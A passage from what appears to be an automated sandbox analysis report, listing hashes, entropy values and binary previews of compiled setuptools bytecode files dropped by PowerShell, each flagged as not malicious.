                                                                                                                                                                                                                              Preview:........x.VfGE..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....d.d.l.m.Z.....e d.............e.d...........d.d.l.m"Z#..d...Z$d.Z%d.Z&d.Z'e.jP..................d.k(..r.d.Z&n.e.jR..................d.k7..r...d.d.l*Z*..e+e*d.........x.Z&Z%d...Z,d...Z-..G.d...d.e.........Z.e&s.e.jR..................d.k(..r.....................d.d...Z.y.d.Z'....................d.d...Z.y.#.e!$.r...e.Z.Y...w.x.Y.w.#.e!$.r...Y..Vw.x.Y.w.)......N....EXTENSION_SUFFIXES)...cache_from_source)...Dict..Iterator..List..Tuple)...Path)...build_ext)...new_compiler)...customize_compiler..get_config_var)...log)...BaseError)...Extension..Libraryz.Cython.Compiler.Main..LDSHARED)..._config_varsc.....................f.....t.........j...................d.k(..ret.........j...........................}...d.t.........d.<...d.t.........d.<...d.t.........d.<...t.........|...........t......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):22064
                                                                                                                                                                                                                              Entropy (8bit):5.263615028933243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:ZP9BBRlI97qfksR+2jcHoMBheEnGqXQFJt4H/DMVh3q:ZP9BBR6ef9+tHBBhevjFJtI/D+h3q
                                                                                                                                                                                                                              MD5:A235B1037147BC09E7E9F318D620D0F9
                                                                                                                                                                                                                              SHA1:CEC3EB27BBF5D6C0158236F141D05D95394958EC
                                                                                                                                                                                                                              SHA-256:C154737961D16DAC9DA797F79A8D342F5521DE9BFF4B3A8F7CE09D24F55E6ED9
                                                                                                                                                                                                                              SHA-512:8544689B3943D5C0F25AD1CB192EDEE34BBF32C5662D35C99B89D2877CE3F3A5AADED52B9DFE3F81A282DC58AFE7AE153AE6D6DD8D1A02920061BE38F357D0EC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.;..............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z...G.d...d.e.j...........................Z.d...Z...G.d...d.........Z y.)......)...partial)...glob)...convert_pathN)...Path)...Dict..Iterable..Iterator..List..Optional..Tuple.....)...unique_everseen)...SetuptoolsDeprecationWarning).z.*.pyiz.py.typedc..........................t.........j...................|.t.........j...................|.........j...................t.........j...................z.............y...N)...os..chmod..stat..st_mode..S_IWRITE)...targets.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/build_py.py..make_writabler........s'.........H.H.V.R.W.W.V._..,..,.t.}.}..<..=.....c.....................<.......e.Z.d.Z.U.d.Z.d.Z.e.e.d.<...d.Z.e.e.....e.d.<...d...Z...d...f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d d.e.e.....f..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10026
                                                                                                                                                                                                                              Entropy (8bit):4.940080135849436
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:r1MonMdRQrAdo80BTUemfqQ9gnBM9zVI2jl/aTRFhtr5of1N:rHMdRkn8IRvPBM7njl/aFztridN
                                                                                                                                                                                                                              MD5:9372C9FD438D28B735A88691DA6649EC
                                                                                                                                                                                                                              SHA1:7DFFF38EDB7A4C3F85B9DE75F3D48AD9ADC5B230
                                                                                                                                                                                                                              SHA-256:7C978C8EA24397FBE9D1A0F8DA73F5580ABC929EB8C9BBC3900F0772F66E5D3D
                                                                                                                                                                                                                              SHA-512:C8530158C78DBDE25B8535A5682B0A18CE0FF97BF3DB344B74A902F99B184E058B8AF224F548922E5D3325B7343F50AAA1A1B2E2C1B65444CD51B16C5F00114F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....G.d...d.e.j ..................e.........Z...G.d...d.........Z.y.)......)...convert_path)...log)...DistutilsOptionErrorN)...easy_install)..._normalization)..._path)...namespaces.....)..._read_utf8_with_fallbackc..........................e.Z.d.Z.d.Z.d.Z.e.j...................d.d.g.z...Z.e.j...................d.g.z...Z.d.Z.d...Z.d...Z.d...Z.e.d...........Z.d...Z.d...Z.d...Z.d...Z.y.)...developz.Set up package for developmentz%install package in 'development mode')...uninstall..uz.Uninstall this source package).z.egg-path=Nz-Set the path to be used in the .egg-link filer....Fc..........................|.j...................r(d.|._.........|.j.............................|.j.............................n.|.j.............................|.j.............................y.).NT).r......multi_version..uninstall_link..uninstall_nam
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5405
                                                                                                                                                                                                                              Entropy (8bit):5.171736649144126
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ALInb93BPuS4lNRTgpq+b0hSCSFlWLFlRiN+D1:VnpxuSsRTiboSCSFcLliNe1
                                                                                                                                                                                                                              MD5:DB699FE96EFB7C86C0FEE6CC614A86B7
                                                                                                                                                                                                                              SHA1:AF06F9DE41002F53A719583B7CFC018D3F167FF9
                                                                                                                                                                                                                              SHA-256:A6B7915FA726E438694B75329C2089B2E19AD9EFD6DCFF8684D219FA1B03EEF0
                                                                                                                                                                                                                              SHA-512:80A9D915F145BBE49F23846675094D2F52AA936C1FE3B2DCA697B34459B64DA1E978324298E12251813CDE6A1F02FDFD987F942C2C85BA90DCFC9C80877E7F6D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.d...Z.y.).zD.Create a dist_info directory.As defined in the wheel specification......N)...contextmanager)...log)...Command)...Path)...cast.....)..._normalization.....)...egg_infoc.....................X.....e.Z.d.Z.d.Z.d.Z.g.d...Z.d.d.g.Z.d.d.i.Z.d...Z.d...Z.e.d.e.d.e.f.d...........Z.d...Z.y.)...dist_infoz.. This command is private and reserved for internal use of setuptools,. users should rely on ``setuptools.build_meta`` APIs.. z@DO NOT CALL DIRECTLY, INTERNAL ONLY: create .dist-info directory).).z.output-dir=..ozYdirectory inside of which the .dist-info will becreated (default: top of the source tree))...tag-date..dz0Add date stamp (e.g. 20050528) to version number).z.tag-build=..bz-Specify explicit tag to add to version number)...no-date..Dz"Don't include date stamp [default])...keep-egg-infoNz,*TRANSITIONA
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):109972
                                                                                                                                                                                                                              Entropy (8bit):5.142092273988755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:wgJH9hynQ3gNM4516tY4LH8m5Yd+ck6XOIJjb49bmiC/Tue2cmPbSrqZpuxl:wgJdEnQNidM8JjeibueM2uHm
                                                                                                                                                                                                                              MD5:856823514E0504867A0C9CB1E82DEA7A
                                                                                                                                                                                                                              SHA1:5A25C2FFC9F49C6E915BA7C004D536ABAE4504FA
                                                                                                                                                                                                                              SHA-256:BAEE9D3AC8EA3640E50DE63EF36DB87FB90A82E89A0B37B6CA0EE0F362F55352
                                                                                                                                                                                                                              SHA-512:03760FAF41167D3ECFF2D7E5CD24FF422CDC356F0AD7F8F2D0963FC5A998F181E8AF903243AE33E420908D5E34656B20F90B1F604D9525B70F153E5998E4C603
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfFT........................|.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l Z d.d.l!Z!d.d.l"Z"d.d.l#Z#d.d.l$Z$d.d.l%Z%d.d.l&Z&d.d.l'Z'd.d.l(Z(d.d.l)Z)d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4m5Z5m6Z6..d.d.l/m7Z7m8Z8..d.d.l9m:Z:m;Z;..d.d.l<m=Z=..d.d.l>m?Z?m@Z@mAZAmBZBmCZCmDZDmEZEmFZFmGZGmHZHmIZImJZJmKZK..d.d.l>Z>d.d.lLmMZMmNZN..d.d.lOmPZP..d.d.lQmRZR....e!j...................d.e>j...............................g.d...ZUd...ZVd...ZWd...ZXd ..ZY..G.d!..d"e,........ZZd#..Z[d$..Z\d%..Z]d&..Z^d'..Z_..G.d(..d)eC........Z`..G.d*..d+e`........Zae.j...................j...................d,d-........d.k(..r.eaZ`d/..Zdd0..Zed1..Zfd2..ZgdTd3..Zhd4..Zid5..Zjd6e.j...................v.r.ejZln.d7..ZldUd8..Zmd9..Znd:..Zod;..Zp..d.d<l.mqZr..dA..Zq..G.dB..dCeu........Zvevj...........................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48903
                                                                                                                                                                                                                              Entropy (8bit):5.480020831600815
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:uJjysKqweHs5koV25izxzJXHtOH1OUy8mQS/A9baujPNUJtaNn7r8672SCvj3wJF:xX3lXvQx+kbaCiZo2p9LwFBQu2G4HQ
                                                                                                                                                                                                                              MD5:065303D54759D68338F022952E6B001C
                                                                                                                                                                                                                              SHA1:4486EC3EE390B730BDE833D00D17565E372A20DF
                                                                                                                                                                                                                              SHA-256:C3697E605C4ADC5DDE7B978433EF2513C73EA3DEF94F7EE65B7C4838AC4F409B
                                                                                                                                                                                                                              SHA-512:B7828B17C0AF4A972F0E3B0148658D81832623E28A729F36463F776FF069200C2E1E4A0CA850854A9BEEAE30B5FA520EE6E5D9060E005F63A7AB4BC578DEA5B4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z m!Z!m"Z"m#Z#m$Z$..d.d.l"m%Z%..d.d.l&m'Z'..d.d.l(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-m.Z.m/Z/..d.d.l0m0Z1..d.d.l2m2Z3..d.d.l4m4Z5..d.d.l6m6Z7..d.d.l8m8Z9..d.d.l:m:Z;..e.r.d.d.l<m=Z=....e.d.e%..........Z>..e.j~..................e@........ZA..G.d...d.e.........ZBd.ZCd.ZD..G.d...d e ........ZE..G.d!..d"e.........ZF..G.d#..d$........ZG..G.d%..d&eG........ZH..G.d'..d(........ZId)eJd*eKf.d+..ZLd,e.d*eMf.d-..ZNd.e.eJ....d/e.eJeJf.....d0e%d*eMf.d1..ZOd2..ZPd3e+d*e.eJ....f.d4..ZQd3e+d*e.eJ....f.d5..ZRd.e.eJ....d/e.eJeJf.....d6e%d*e.eJeJf.....f.d7..ZSd8e%d*eJf.d9..ZTd:e.eJeJf.....d*e.eJ....f.d;..ZUd.e.eJ....d:e.eJeJf.....d*e.e.eJe.eJ....f.........f.d<..ZVd:e.eJeJf.....d*e.eJeJf.....f.d=..ZWd>eJd?eJd@eJdAeJd*eMf.dB..ZXdCe>d*e>f.dD..ZY..G.dE..dFe$j...........................Z[dGZ\dHeJ
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35377
                                                                                                                                                                                                                              Entropy (8bit):5.140100731683693
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Limalg0VBP68wzsMkw7E/Zo3twISQsBkb/9d/jJC3vTUnOwlaQ+70wlHivCv+:eNgWBJMkwGZo3CqT/j+vInp0Z3HivCv+
                                                                                                                                                                                                                              MD5:BD9E2A0F2D756FAD3B732C04E154A45C
                                                                                                                                                                                                                              SHA1:BB60EE70B351B103FBD851C62921B7A1C7F0A7AB
                                                                                                                                                                                                                              SHA-256:437CB9645D65940FB4F9386CA538B73E8632D165E74CD91804A1DE62EE6E879E
                                                                                                                                                                                                                              SHA-512:60961FF040545C114C22BB0BC0D8B7150C9591999329EFBE96D27E4EF87ECA9CBD5B9A8CACA2DD16709FC4D8A9346D5521E244CF1EEE6DD55E2EBDE08DB9A02E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.g..............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&....d.jN..................e.jP....................Z)d...Z*..G.d...d.........Z+..G.d...d.e+e.........Z,..G.d...d.e.........Z...G.d...d.e.........Z-d...Z.d...Z/d ..Z0e.jb..................Z1e.jd..................Z2d!..Z3d"..Z4d(d#..Z5d$..Z6d)d%..Z7..G.d&..d'e&........Z8y.)*zUsetuptools.command.egg_info..Create a distribution's .egg-info directory and contents.....)...FileList)...DistutilsInternalError)...convert_path)...logN.....)...metadata)..._entry_points.._normalization.....)..._requirestxt)...Command)...sdist)...walk_revctrl)...edit_config)...bdist_egg)...glob)...packaging)...SetuptoolsDeprecationWarningz.{}.{}c..........................d.}...|.j...................t.........j......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6734
                                                                                                                                                                                                                              Entropy (8bit):5.249063337542363
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:aF+v42rESr2ez0CYFHQgFuB/N7VFM8lUxtDqa05SX:Y+zieLGHQgAV7VFMpxtDqa0e
                                                                                                                                                                                                                              MD5:40625AEEAE19A05C67157E89D20101C7
                                                                                                                                                                                                                              SHA1:E2FB62C6D5FE4BA7727BEA37DB531A2E85E28DC5
                                                                                                                                                                                                                              SHA-256:EA87C2E89E63E22658B011D128074A70FB58D375574804954F094FFBCD6E53D2
                                                                                                                                                                                                                              SHA-512:C9F5BBEA304FEDDC904D578B382AB8DBC0FDCE9A4887C6A67DC2EAFF90EB7707EE04C3359413D75712B6FD349E5C9E34BBDF6580C14A5117D66917B3CC91ED82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................F.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.c...m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j...................Z...G.d...d.e.j...........................Z.e.j...................j$..................D...c.g.c.]...}.|.d.....e.j&..................v.s...|.......c.}.e.j(..................z...e._.........y.c...c.}.w.)......)...DistutilsArgErrorN)...cast.....)...SetuptoolsDeprecationWarning..SetuptoolsWarning.....)...bdist_eggc.............................e.Z.d.Z.d.Z.e.j...................j...................d.d.g.z...Z.e.j...................j...................d.d.g.z...Z.d.d...f.d.d...f.g.Z...e.e.........Z...f.d...Z...f.d...Z.d...Z...f.d...Z.e.d...........Z.d...Z...x.Z.S.)...installz7Use easy_install to install the package, w/dependencies)...old-and-unmanageableNz.Try not to use this!)..!single-version-externally-managedNz5used by system package builders to create 'flat' eggsr....r......install_egg_infoc...........................y...N
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3736
                                                                                                                                                                                                                              Entropy (8bit):4.874279118083322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:y9vWIJi8Xa6Uv7rfhEcUhBmKfPMz1vqbJpA:ZIQ8XNU3hEnsqbJC
                                                                                                                                                                                                                              MD5:A9033E42C11B6AE5C4F90F986E3C1BBA
                                                                                                                                                                                                                              SHA1:17DDBFDF88C3F70B41E03F65AAFCFAE9E38028D7
                                                                                                                                                                                                                              SHA-256:CD31C32F97E0E3F3FCCE56FE68D9B46805D2FB2AB148D36AF78E4D7D262119AC
                                                                                                                                                                                                                              SHA-512:F4A516228907568256D90B0028AB5521668E63487D6F4E6C64E95271A8A50EC5813886C85C0CF5CC09BBE0345B7D18650669117D225385D513DF75D89F6EF067
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................x.....d.d.l.m.Z.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j...................e.........Z.y.)......)...log..dir_utilN)...Command)...namespaces)...unpack_archive.....)...ensure_directoryc.....................8.....e.Z.d.Z.d.Z.d.Z.d.g.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...install_egg_infoz.Install an .egg-info directory for the package).z.install-dir=..dz.directory to install toc...........................d.|._.........y...N)...install_dir....selfs.... .TC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/install_egg_info.py..initialize_optionsz#install_egg_info.initialize_options....s...................c...........................|.j...................d.d...........|.j...................d.........}.|.j.............................d...}.|.j...................|._.........t.........j...................j...................|.j...................|.........|._.........g.|._.........y.).N..install_lib).r....r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5691
                                                                                                                                                                                                                              Entropy (8bit):5.361715787101167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NI3gRWyAJfTM3fWFtJQFyBnf3SzUKtctmKwqFRO8Dxn:N4gwHtT/bwsf3HKitm6
                                                                                                                                                                                                                              MD5:1988ECD0B796D4A95CD4DAA3FFDFE1C6
                                                                                                                                                                                                                              SHA1:C95187C3036A7ADAEF2A48ABF020506EED120926
                                                                                                                                                                                                                              SHA-256:84D45E700DE7F60F5F3EB26C2F12EEA78FFE3E6153D4F76C476D1EF24798B256
                                                                                                                                                                                                                              SHA-512:D1B0BB17671F10D9E1F10EF74C46C2EE29C2EA3CCC23FC11C7E5A410DE6F744A8BE339638A1D176E91A6B9113EAF467E24622D1D281CFCC2FA26C5DFAE740C23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................`.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.c...m.Z.....G.d...d.e.j...........................Z.y.)......N)...product..starmapc.....................^.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.e.d...........Z.d...Z.e.d...........Z.........d.d...Z.d...Z.y.)...install_libz9Don't add compiled flags to filenames of non-Python filesc.....................l.....|.j.............................|.j...........................}.|...|.j...................|...........y.y...N)...build..install..byte_compile)...self..outfiless.... .OC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/install_lib.py..runz.install_lib.run....s/..................<.<.>..................h..'.... .....c..............................f.d.....j...........................D.........}.t.........|...j...................................}.t.........t...........j...................|.................S.).z.. Return a collections.Sized collections.Container of paths to be. exc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3775
                                                                                                                                                                                                                              Entropy (8bit):5.049507278688658
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:uyBg6Utpd0yxk9XI/SiZpZJSv6sq3ohfcllD2HW/mNk6SftgRjCguNCp4Q/Pt:usye9XIKSZ8v6sbFcYGmu6ZTu4pL
                                                                                                                                                                                                                              MD5:62398483A9D0F1B8BA976B62466255FF
                                                                                                                                                                                                                              SHA1:985F73F171627B7A5B79E9EB9AE3969518AC5F5E
                                                                                                                                                                                                                              SHA-256:200D4B28B7FE3A8C6C659354E9CA89B13A454FC39D6B6DCFB20BBD96A6776FBE
                                                                                                                                                                                                                              SHA-512:115D82F91565C07F5314F601047EB217B34D06E890ADF7C35A4644ADFF04DCCF57712BEB1D341510F5387B1C8DEB9A6E5CCEE7E26224DD0AF63C33DE1EAF9658
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vfs.........................h.....d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.e.j...........................Z.y.)......)...logN.....)...ensure_directoryc.....................*.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.d...Z.y.)...install_scriptsz;Do normal script install, plus any egg_info wrapper scriptsc.....................P.....t.........j...................j...................|...........d.|._.........y.).NF)...origr......initialize_options..no_ep....selfs.... .SC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/install_scripts.pyr....z"install_scripts.initialize_options....s................./../....5............c...........................|.j...................d...........|.j...................j...................r t.........j...................j...................|...........n.g.|._.........|.j...................r.y.|.j.............................y.).N..egg_info)...run_command..distribution..scriptsr....r......run..outfilesr......_insta
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):982
                                                                                                                                                                                                                              Entropy (8bit):5.1298214835218126
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:tp0g2yp3HnDlzilaY5GKNxf2PHnubORueSPdMegil/flq:trvp3Hn1aamDxGHKQEaPmI
                                                                                                                                                                                                                              MD5:3870DA0B115ADC84575CF36CCF413DAA
                                                                                                                                                                                                                              SHA1:2FFEF75F69D0B92A16774A650020DF062BF1D6A3
                                                                                                                                                                                                                              SHA-256:D08AD9D6DDB85B1D55A8AAD5BF56BCA0D3CBFA10B9478AD027D93F6AC7FF96F6
                                                                                                                                                                                                                              SHA-512:0ECF60A908B61C1BCB26E69CE81EA300E184E055CB99EF7470E55FDAB67097CCA0E74308E409BB779F9D4AD783AE43AFBB2D4F48B5592142ED2705D2B5B7B502
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................X.....d.d.l.m.Z...d.d.l.m.c...m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z.y.)......)...logN)...RemovedCommandErrorc...........................e.Z.d.Z.d.Z.d...Z.y.)...registerz+Formerly used to register packages on PyPI.c.....................b.....d.}.|.j...................d.|.z...t.........j.............................t.........|...........).Nz]The register command has been removed, use twine to upload instead (https://pypi.org/p/twine)z.ERROR: )...announcer......ERRORr....)...self..msgs.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/register.py..runz.register.run....s/.........3...............i.#.o.s.y.y..1..!.#..&..&.....N)...__name__..__module__..__qualname__..__doc__r......r....r....r....r........s........5....'r....r....)...distutilsr......distutils.command.register..commandr......orig..setuptools.errorsr....r....r....r......<module>r........s!.............)..)..1....'.t.}.}....'r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3643
                                                                                                                                                                                                                              Entropy (8bit):5.217398690497275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:GhPiuvnbxMDqbOnSm9bjdERP3P9UwxIMBEnKZrlYWIvJqZ5vIVLfbk/I+kSI:pCb0L9bBsSwx3BAK/YWIvnfyC
                                                                                                                                                                                                                              MD5:C4BE1C19722ACEA076ADDEC70CE65A61
                                                                                                                                                                                                                              SHA1:7B9EF5566210E7293E07C096F17150923F21C2BC
                                                                                                                                                                                                                              SHA-256:48A29F34880906E88D2CD6990917284A9A956737D41442CE57C02F8BEA337D07
                                                                                                                                                                                                                              SHA-512:66CE685AE7095A8DA0DFDD5717E0DCC73B92E1059063C74AE8213746946D8335655447F9E2C6DA3B294862B89D9C4B02D55E863D5A5C00D345287EA514D0FCEA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.VfT.........................f.....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z.y.)......)...convert_path)...log)...DistutilsOptionErrorN)...List)...Commandc.....................D.....e.Z.d.Z.U.d.Z.d.Z.g.d...Z.g.Z.e.e.....e.d.<...d...Z.d...Z.d...Z.y.)...rotatez.Delete older distributionsz2delete older distributions, keeping N newest files).).z.match=..mz.patterns to match (required)).z.dist-dir=..dz%directory where the distributions are).z.keep=..kz(number of matching distributions to keep..boolean_optionsc...........................d.|._.........d.|._.........d.|._.........y.).N)...match..dist_dir..keep)...selfs.... .JC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/rotate.py..initialize_optionsz.rotate.initialize_options....s................................c..........................|.j.....................t.........d...........|.j.....................t.........d.............t.........|.j..................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                              Entropy (8bit):5.254897907414277
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:IlczkR//DAAhS6voG+0cGuF+oKNxf20C+8NVRj+znTjG:IlMk9ng6voGraF+dxa+sGnTjG
                                                                                                                                                                                                                              MD5:60D9E44C9FB3D13779E44FDE79B8B820
                                                                                                                                                                                                                              SHA1:A6A7A5A4A2B9E4A90464BEC2E443172A979748E5
                                                                                                                                                                                                                              SHA-256:8478604337D76E72FC8693F75962AD18FD62CF55232F58477AB76CD590A92D3D
                                                                                                                                                                                                                              SHA-512:4E2990C326883A26B9D29881342EDA2256522D405F7F80D22FB54B6206D3D8365D8FD68057DC5122C9923E315418CF5FB5CB470F8220B4E111A59F9554AC1A48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................*.....d.d.l.m.Z.m.Z.....G.d...d.e.........Z.y.)......)...edit_config..option_basec...........................e.Z.d.Z.d.Z.d.Z.d...Z.y.)...saveoptsz#Save command-line options to a filez7save supplied options to setup.cfg or other config filec...........................|.j...................}.i.}.|.j...................D.]M..}.|.d.k(..r...|.j...................|.........j...........................D.]#..\...}.\...}.}.|.d.k(..s...|.|.j...................|.i.........|.<....%...O..t.........|.j...................|.|.j.............................y.).Nr....z.command line)...distribution..command_options..get_option_dict..items..setdefaultr......filename..dry_run)...self..dist..settings..cmd..opt..src..vals.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/command/saveopts.py..runz.saveopts.run....s........... .. ............'..'....<.C....j.. ....#'.#7.#7...#<.#B.#B.#D....<.....Z.c.3.......(.8;.H..'..'...R..0....5....<....<......D.M.M.8.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11363
                                                                                                                                                                                                                              Entropy (8bit):5.19067137812934
                                                                                                                                                                                                                              Encrypted:false
